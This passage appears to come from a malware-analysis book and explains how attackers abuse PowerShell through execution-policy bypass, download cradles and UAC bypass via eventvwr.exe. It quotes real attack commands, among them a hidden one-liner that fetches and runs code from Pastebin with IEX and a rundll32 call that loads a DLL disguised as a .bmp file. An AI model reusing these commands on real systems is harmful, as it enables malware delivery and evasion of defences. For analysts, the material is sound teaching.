With an understanding of basic PowerShell and what tools to use for analysis, let's now look at how attackers use PowerShell. Due to the restriction in executing the PowerShell scripts (.ps1) via the PowerShell console or by double-clicking (which will open it in notepad rather than executing the script), it is unlikely to see adversaries sending PowerShell scripts to their victims directly. The attacker must first trick the user into executing the malicious code; this is mostly done by sending email attachments containing files such as .lnk, .wsf, javascript, or malicious macro documents. Once the user is tricked into opening the attached files, the malicious code can then invoke PowerShell directly (powershell.exe), or indirectly via cmd.exe, Wscript, Cscript, and so on. After the PowerShell is invoked, various methods can be used to bypass the execution policy. For example, to bypass an execution restriction policy, an attacker can use the malicious code to invoke powershell.exe and pass the Bypass execution policy flag, as shown in the following screenshot. This technique will work even if the user is not an Administrator, and it overrides the default execution restriction policy and executes the script:

In the same manner, attackers use various PowerShell command-line arguments to bypass the execution policy. The following table outlines the most common PowerShell arguments used to evade detection and bypass local restrictions:

Apart from using PowerShell command-line arguments, attackers also make use of cmdlets or .NET APIs in the PowerShell scripts. The following are the most frequently used commands and functions:

• Invoke-Expression (IEX): This cmdlet evaluates or executes a specified string as a command
• Invoke-Command: This cmdlet can execute a PowerShell command on either a local or a remote computer
• Start-Process: This cmdlet starts a process from a given file path
• DownloadString: This method from System.Net.WebClient (WebClient Class) downloads the resource from an URL as a string
• DownloadFile(): This method from System.Net.WebClient (WebClient Class) downloads the resource from an URL to a local file

The following is an example of a PowerShell downloader used in an attack mentioned in the author's blog post (https://cysinfo.com/cyber-attack-targeting-indian-navys-submarine-warship-manufacturer/). In this case, the PowerShell command was invoked via cmd.exe by the malicious macro contained within the Microsoft Excel sheet, which was sent in an email attachment to the victims.
The PowerShell drops the downloaded executable in the %TEMP% directory as doc6.exe. It then adds a registry entry for the dropped executable and invokes eventvwr.exe, which is an interesting registry hijack technique which allows doc6.exe to be executed by eventvwr.exe with high integrity level. This technique also silently bypasses the UAC (user account control):

The following is a PowerShell command from a targeted attack (https://cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-embassies-and-indian-mea/). In this case, the PowerShell is invoked by the malicious macro and instead of downloading an executable directly, the base64 content from a Pastebin link was downloaded using the DownloadString method. After downloading the encoded content, it is decoded and dropped onto the disk:

powershell -w hidden -ep bypass -nop -c "IEX ((New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/[removed]'))"

In the following example, before invoking PowerShell, a malware dropper first writes a DLL with a .bmp extension (heiqh.bmp) in the %Temp% directory and then launches rundll32.exe via PowerShell to load the DLL and executes the DLL's export function dlgProc:

PowerShell cd $env:TEMP ;start-process rundll32.exe heiqh.bmp,dlgProc